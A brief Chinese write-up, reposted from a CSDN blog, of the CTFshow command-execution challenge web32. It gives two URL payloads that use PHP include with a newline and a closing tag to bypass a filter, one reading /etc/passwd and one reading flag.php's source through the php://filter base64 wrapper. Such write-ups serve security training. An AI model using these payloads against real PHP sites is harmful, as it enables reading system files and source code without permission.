当前位置：网站首页>CTFshow，命令执行：web32

CTFshow，命令执行：web32

2022-08-01 09:48:00 【Part 02】

?c=include%0a$_GET[1]?>&1=/etc/passwd

最后一行 php 可不带分号，包含逃逸

没有输出语句不能输出文件

伪协议读取

?c=include%0a$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php

版权声明
本文为[Part 02]所创，转载请带上原文链接，感谢
https://blog.csdn.net/qq_62260856/article/details/126079414